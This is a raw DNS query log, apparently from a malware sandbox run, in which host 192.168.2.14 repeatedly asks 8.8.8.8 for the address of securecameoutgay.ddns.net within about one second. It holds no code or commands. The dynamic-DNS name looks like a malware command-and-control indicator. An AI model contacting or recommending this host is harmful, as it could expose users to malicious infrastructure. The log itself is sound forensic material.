                                                    Oct 12, 2024 23:05:40.669157982 CEST192.168.2.148.8.8.80x5059Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.676105022 CEST192.168.2.148.8.8.80x5059Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.684452057 CEST192.168.2.148.8.8.80x5f6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.692845106 CEST192.168.2.148.8.8.80x5f6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.699877024 CEST192.168.2.148.8.8.80x5f6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.707084894 CEST192.168.2.148.8.8.80x5f6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.714860916 CEST192.168.2.148.8.8.80x5f6fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.721987963 CEST192.168.2.148.8.8.80xe990Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.729967117 CEST192.168.2.148.8.8.80xe990Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.737462044 CEST192.168.2.148.8.8.80xe990Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.744563103 CEST192.168.2.148.8.8.80xe990Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.752893925 CEST192.168.2.148.8.8.80xe990Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.759656906 CEST192.168.2.148.8.8.80xdb21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.767985106 CEST192.168.2.148.8.8.80xdb21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.776788950 CEST192.168.2.148.8.8.80xdb21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.784539938 CEST192.168.2.148.8.8.80xdb21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.793468952 CEST192.168.2.148.8.8.80xdb21Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.800529003 CEST192.168.2.148.8.8.80xcc00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.810528994 CEST192.168.2.148.8.8.80xcc00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.817517042 CEST192.168.2.148.8.8.80xcc00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.824939966 CEST192.168.2.148.8.8.80xcc00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.832070112 CEST192.168.2.148.8.8.80xcc00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.839998960 CEST192.168.2.148.8.8.80x49bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.846388102 CEST192.168.2.148.8.8.80x49bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.852684021 CEST192.168.2.148.8.8.80x49bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.859463930 CEST192.168.2.148.8.8.80x49bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.866420984 CEST192.168.2.148.8.8.80x49bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.872890949 CEST192.168.2.148.8.8.80xae22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.879431009 CEST192.168.2.148.8.8.80xae22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.885786057 CEST192.168.2.148.8.8.80xae22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.892214060 CEST192.168.2.148.8.8.80xae22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.899116993 CEST192.168.2.148.8.8.80xae22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.906363010 CEST192.168.2.148.8.8.80x8a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.913034916 CEST192.168.2.148.8.8.80x8a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.919399023 CEST192.168.2.148.8.8.80x8a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.926480055 CEST192.168.2.148.8.8.80x8a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.932945967 CEST192.168.2.148.8.8.80x8a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.939671040 CEST192.168.2.148.8.8.80x6dd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.946865082 CEST192.168.2.148.8.8.80x6dd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.954330921 CEST192.168.2.148.8.8.80x6dd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.961144924 CEST192.168.2.148.8.8.80x6dd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.968204975 CEST192.168.2.148.8.8.80x6dd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.975415945 CEST192.168.2.148.8.8.80xe91eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.982017040 CEST192.168.2.148.8.8.80xe91eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.988697052 CEST192.168.2.148.8.8.80xe91eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.996007919 CEST192.168.2.148.8.8.80xe91eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.002911091 CEST192.168.2.148.8.8.80xe91eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.009898901 CEST192.168.2.148.8.8.80x2899Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.016305923 CEST192.168.2.148.8.8.80x2899Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.022959948 CEST192.168.2.148.8.8.80x2899Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.029510021 CEST192.168.2.148.8.8.80x2899Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.035921097 CEST192.168.2.148.8.8.80x2899Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.042866945 CEST192.168.2.148.8.8.80x9260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.049444914 CEST192.168.2.148.8.8.80x9260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.055988073 CEST192.168.2.148.8.8.80x9260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.062711954 CEST192.168.2.148.8.8.80x9260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.069380045 CEST192.168.2.148.8.8.80x9260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.076240063 CEST192.168.2.148.8.8.80xf202Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.083282948 CEST192.168.2.148.8.8.80xf202Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.089864969 CEST192.168.2.148.8.8.80xf202Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.096450090 CEST192.168.2.148.8.8.80xf202Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.103138924 CEST192.168.2.148.8.8.80xf202Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.109703064 CEST192.168.2.148.8.8.80xed13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.116472006 CEST192.168.2.148.8.8.80xed13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.123733044 CEST192.168.2.148.8.8.80xed13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.130311966 CEST192.168.2.148.8.8.80xed13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.136960983 CEST192.168.2.148.8.8.80xed13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.144114971 CEST192.168.2.148.8.8.80x89aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.150780916 CEST192.168.2.148.8.8.80x89aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.157807112 CEST192.168.2.148.8.8.80x89aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.165792942 CEST192.168.2.148.8.8.80x89aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.172929049 CEST192.168.2.148.8.8.80x89aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.179244041 CEST192.168.2.148.8.8.80x83e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.186038017 CEST192.168.2.148.8.8.80x83e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.193396091 CEST192.168.2.148.8.8.80x83e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.199836969 CEST192.168.2.148.8.8.80x83e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.206587076 CEST192.168.2.148.8.8.80x83e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.213319063 CEST192.168.2.148.8.8.80x4dbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.220407963 CEST192.168.2.148.8.8.80x4dbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.226964951 CEST192.168.2.148.8.8.80x4dbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.233516932 CEST192.168.2.148.8.8.80x4dbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.239945889 CEST192.168.2.148.8.8.80x4dbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.250030041 CEST192.168.2.148.8.8.80x3069Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.256776094 CEST192.168.2.148.8.8.80x3069Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.264050961 CEST192.168.2.148.8.8.80x3069Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.270606041 CEST192.168.2.148.8.8.80x3069Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.277549982 CEST192.168.2.148.8.8.80x3069Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.284111977 CEST192.168.2.148.8.8.80x50d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.290472984 CEST192.168.2.148.8.8.80x50d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.297110081 CEST192.168.2.148.8.8.80x50d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.303677082 CEST192.168.2.148.8.8.80x50d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.310265064 CEST192.168.2.148.8.8.80x50d2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.318315983 CEST192.168.2.148.8.8.80xa98bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.324978113 CEST192.168.2.148.8.8.80xa98bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.331994057 CEST192.168.2.148.8.8.80xa98bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.338797092 CEST192.168.2.148.8.8.80xa98bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.345616102 CEST192.168.2.148.8.8.80xa98bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.352837086 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.359638929 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.366691113 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.373200893 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.379973888 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.387810946 CEST192.168.2.148.8.8.80x5adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.394593954 CEST192.168.2.148.8.8.80x5adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.401418924 CEST192.168.2.148.8.8.80x5adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.408466101 CEST192.168.2.148.8.8.80x5adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.415213108 CEST192.168.2.148.8.8.80x5adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.421483994 CEST192.168.2.148.8.8.80x1c0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.428148031 CEST192.168.2.148.8.8.80x1c0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.434622049 CEST192.168.2.148.8.8.80x1c0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.441286087 CEST192.168.2.148.8.8.80x1c0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.448019028 CEST192.168.2.148.8.8.80x1c0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.454502106 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.460809946 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.468167067 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.474956036 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.481585979 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.487832069 CEST192.168.2.148.8.8.80xaae8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.494364023 CEST192.168.2.148.8.8.80xaae8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.501162052 CEST192.168.2.148.8.8.80xaae8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.507685900 CEST192.168.2.148.8.8.80xaae8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.514123917 CEST192.168.2.148.8.8.80xaae8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.520612955 CEST192.168.2.148.8.8.80xb7ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.527489901 CEST192.168.2.148.8.8.80xb7ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.534178972 CEST192.168.2.148.8.8.80xb7ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.540834904 CEST192.168.2.148.8.8.80xb7ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.547488928 CEST192.168.2.148.8.8.80xb7ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.554434061 CEST192.168.2.148.8.8.80x7476Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.560740948 CEST192.168.2.148.8.8.80x7476Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.567996025 CEST192.168.2.148.8.8.80x7476Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.575283051 CEST192.168.2.148.8.8.80x7476Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.582071066 CEST192.168.2.148.8.8.80x7476Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.588620901 CEST192.168.2.148.8.8.80x712cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.596153975 CEST192.168.2.148.8.8.80x712cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.602665901 CEST192.168.2.148.8.8.80x712cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.609328032 CEST192.168.2.148.8.8.80x712cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.616025925 CEST192.168.2.148.8.8.80x712cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.624653101 CEST192.168.2.148.8.8.80x758Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.631418943 CEST192.168.2.148.8.8.80x758Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.638052940 CEST192.168.2.148.8.8.80x758Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.644634962 CEST192.168.2.148.8.8.80x758Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.651670933 CEST192.168.2.148.8.8.80x758Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.658436060 CEST192.168.2.148.8.8.80x6474Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.665261030 CEST192.168.2.148.8.8.80x6474Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.672523022 CEST192.168.2.148.8.8.80x6474Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.679872036 CEST192.168.2.148.8.8.80x6474Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.686465025 CEST192.168.2.148.8.8.80x6474Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.693092108 CEST192.168.2.148.8.8.80x2ae9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.699912071 CEST192.168.2.148.8.8.80x2ae9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.706995010 CEST192.168.2.148.8.8.80x2ae9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.713823080 CEST192.168.2.148.8.8.80x2ae9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.720740080 CEST192.168.2.148.8.8.80x2ae9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.727137089 CEST192.168.2.148.8.8.80xaaa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.733520985 CEST192.168.2.148.8.8.80xaaa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.739998102 CEST192.168.2.148.8.8.80xaaa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.746787071 CEST192.168.2.148.8.8.80xaaa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.753422022 CEST192.168.2.148.8.8.80xaaa7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.760162115 CEST192.168.2.148.8.8.80x77a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.766863108 CEST192.168.2.148.8.8.80x77a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.774440050 CEST192.168.2.148.8.8.80x77a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.781079054 CEST192.168.2.148.8.8.80x77a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.787926912 CEST192.168.2.148.8.8.80x77a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.794681072 CEST192.168.2.148.8.8.80x6061Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.801274061 CEST192.168.2.148.8.8.80x6061Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.808017969 CEST192.168.2.148.8.8.80x6061Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.814477921 CEST192.168.2.148.8.8.80x6061Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.821069002 CEST192.168.2.148.8.8.80x6061Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.827797890 CEST192.168.2.148.8.8.80x658Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.834342957 CEST192.168.2.148.8.8.80x658Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.841238976 CEST192.168.2.148.8.8.80x658Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.847645044 CEST192.168.2.148.8.8.80x658Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.854110956 CEST192.168.2.148.8.8.80x658Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.860935926 CEST192.168.2.148.8.8.80x7590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.867481947 CEST192.168.2.148.8.8.80x7590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.873975039 CEST192.168.2.148.8.8.80x7590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.880578995 CEST192.168.2.148.8.8.80x7590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.887358904 CEST192.168.2.148.8.8.80x7590Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.894238949 CEST192.168.2.148.8.8.80x3ff2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.902631998 CEST192.168.2.148.8.8.80x3ff2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.910758972 CEST192.168.2.148.8.8.80x3ff2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.917186975 CEST192.168.2.148.8.8.80x3ff2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.923938036 CEST192.168.2.148.8.8.80x3ff2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.930723906 CEST192.168.2.148.8.8.80x69f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.937750101 CEST192.168.2.148.8.8.80x69f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.944143057 CEST192.168.2.148.8.8.80x69f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.951194048 CEST192.168.2.148.8.8.80x69f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.957535028 CEST192.168.2.148.8.8.80x69f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.964507103 CEST192.168.2.148.8.8.80xe66aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
